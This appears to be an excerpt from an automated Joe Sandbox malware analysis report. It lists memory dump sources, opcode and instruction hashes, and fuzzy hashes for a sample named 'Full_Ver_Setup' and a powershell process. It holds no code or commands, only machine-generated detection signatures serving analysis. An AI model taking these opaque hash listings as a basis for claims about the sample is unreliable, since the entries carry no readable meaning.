                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                  • Instruction ID: 0e340fbbf3a62d4f1f126bfbc9c135ea72328a28e4c225d017c5f1eade6074fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 7411C273A251D10EC326DD3D8420565BFA30AD3534B5D83D9E4B89B2E2D6228DCA8359
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4cdf6c10ea330978e71f44dcc1b8b2686bbce5d725340b13a9b09878a20a5b95
                                                                                                                                                                  • Instruction ID: ddb8d2ecc54bd38ce56915c675196c5cf0c1764d8cb0c7b2d2b77c9def76e040
                                                                                                                                                                  • Opcode Fuzzy Hash: 4cdf6c10ea330978e71f44dcc1b8b2686bbce5d725340b13a9b09878a20a5b95
                                                                                                                                                                  • Instruction Fuzzy Hash: F30192B6E103126BD720DE559CC0727FBF96B80A00F1C802CD4455BB41EFB5E9A98691
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3efdd470778db0570fd0940dc727e321a9f08f648cb0bebc6529bde5ac1cdd91
                                                                                                                                                                  • Instruction ID: 2e5fe042fd1c798bef7ce68973e0c32f9d274284d4ba804fd0bfc27a64dc0bb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3efdd470778db0570fd0940dc727e321a9f08f648cb0bebc6529bde5ac1cdd91
                                                                                                                                                                  • Instruction Fuzzy Hash: 10110472828172BBDF24DF248C20776BBA5EF67240B0D44BED8C697251D22A98C5D692
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 03548ad1a0289b64fa111b8a088a157184dc12421b569fdc7d51542ef1fb2b78
                                                                                                                                                                  • Instruction ID: c33d48dd84b751776800887aff6c2098bdcfa53997ab1e6682b4df232c1a7a0b
                                                                                                                                                                  • Opcode Fuzzy Hash: 03548ad1a0289b64fa111b8a088a157184dc12421b569fdc7d51542ef1fb2b78
                                                                                                                                                                  • Instruction Fuzzy Hash: F1012D35724331EBD314DB548C8093A77E2FBE9B14F08457DD4865B650C2B09C40CB69
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 633041c384c3c93bd91ecba9c63cc379b2e0c5ca734537abaa547604c1bba8ab
                                                                                                                                                                  • Instruction ID: ca3967b082fb3e7ec5169955befd72b528df5613deb09a59cc2c2efc9b4ea979
                                                                                                                                                                  • Opcode Fuzzy Hash: 633041c384c3c93bd91ecba9c63cc379b2e0c5ca734537abaa547604c1bba8ab
                                                                                                                                                                  • Instruction Fuzzy Hash: DD01F97462830197DB18CB24AA8093FB399FBE7624F7411ACD44327255D321DC958BDA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ba85686cd7d01f69d27cca88313ae49ecdca91c56a8651490bb07c8e96226a13
                                                                                                                                                                  • Instruction ID: ca0399a95d18608a8e4137ba4bb22b033497b74a7186edb7791dc2be3a7c179d
                                                                                                                                                                  • Opcode Fuzzy Hash: ba85686cd7d01f69d27cca88313ae49ecdca91c56a8651490bb07c8e96226a13
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01D135684B019BD325CF25CC81B63B7E7FF85201F58892CA58297A96D679F40A8B04
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: dd4b7887590947e640507599629081ddc326399db3d38bd18dfb5d94dc5442e2
                                                                                                                                                                  • Instruction ID: ea564e2a5d7a874b0407d6aac1ed56a46f02bc8f9339fd9171aed7a80d503e06
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8e254fba5ec2b8e12982ed5c72ddaa6cecd9f693a9afca212ed9e7a62c7dd1b4
                                                                                                                                                                  • Instruction ID: d198b4e70227401a5a64bb0f5f6a49a123568e90b3599940d106f86dc9494782
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e254fba5ec2b8e12982ed5c72ddaa6cecd9f693a9afca212ed9e7a62c7dd1b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 80F01C35E00105EFCB18CF99C8805ADF7B6FB88320B248559D959A7750C736AC96CB90
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-1608119003
                                                                                                                                                                  • Opcode ID: 70f0388058997682ff68a6054e8a685dfe78926c42fdf5aa88738dab8b4ad227
                                                                                                                                                                  • Instruction ID: 6a4308866ac1d8ffb1ca9f1fe03e575930c17055c1e1c536d10cc313107d1d6f
                                                                                                                                                                  • Opcode Fuzzy Hash: 70f0388058997682ff68a6054e8a685dfe78926c42fdf5aa88738dab8b4ad227
                                                                                                                                                                  • Instruction Fuzzy Hash: D5A18AB27043568FC7694B69984166ABFF1AFC2A10F1884BBD641CF353DA36C9C5C3A1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q
                                                                                                                                                                  • API String ID: 0-4192453120
                                                                                                                                                                  • Opcode ID: 3e851ba5773ea95ba2d22d71fccce006fc02a90103621d2fcaca4c7e21f5d8f0
                                                                                                                                                                  • Instruction ID: 957923f76dcd598dd2595858bb26a3486292dc1cc1ed6315e0687a2a1e8a5703
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e851ba5773ea95ba2d22d71fccce006fc02a90103621d2fcaca4c7e21f5d8f0
                                                                                                                                                                  • Instruction Fuzzy Hash: 75B18CB1B043069FDBA48A698845767BBE2AFC2B10F14C46BD6059B353EF31C9C1C791
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q
                                                                                                                                                                  • API String ID: 0-2369969929
                                                                                                                                                                  • Opcode ID: 3bbc267d4d0a82ca6853b7014daa59259057f4ac3b1ea3d59abdc62d10a66fd5
                                                                                                                                                                  • Instruction ID: 935418c0026871b2e4f7e217efe1c81e550de6bcfbcd3f43bd886bede3a1ec2c
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bbc267d4d0a82ca6853b7014daa59259057f4ac3b1ea3d59abdc62d10a66fd5
                                                                                                                                                                  • Instruction Fuzzy Hash: E2816BB1B043459FC7658B698851766BFB2AF82B14F1484BBD605CF293DE31C9C4C3A2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-578306960
                                                                                                                                                                  • Opcode ID: ccebabe54b497da9d86bf6216f1aa21b97a5c9721bc2b5aa88aba87d3101b512
                                                                                                                                                                  • Instruction ID: 0acbdde96a8c7180fd537fcd329885bf56fa87b825d31325ab3a371ad6778eaf
                                                                                                                                                                  • Opcode Fuzzy Hash: ccebabe54b497da9d86bf6216f1aa21b97a5c9721bc2b5aa88aba87d3101b512
                                                                                                                                                                  • Instruction Fuzzy Hash: 423118767053198FD7588A699444726BBE5AF85A20B28846EE684CF362CA32DD84C790
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                                                  • Opcode ID: 9a20c53ccc8a91cdf9c20f623bbc0737b9492f9499a75a9bc4c89adcbaec4916
                                                                                                                                                                  • Instruction ID: 0e03a0610176aa07816f9bb674cf7cd4b715a726bfd2c80f8344f01ee8114c9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a20c53ccc8a91cdf9c20f623bbc0737b9492f9499a75a9bc4c89adcbaec4916
                                                                                                                                                                  • Instruction Fuzzy Hash: 062147B175024A5BFBB85D6E9C80B2BABDABBC4715F24883AA605CB381CD35C941C361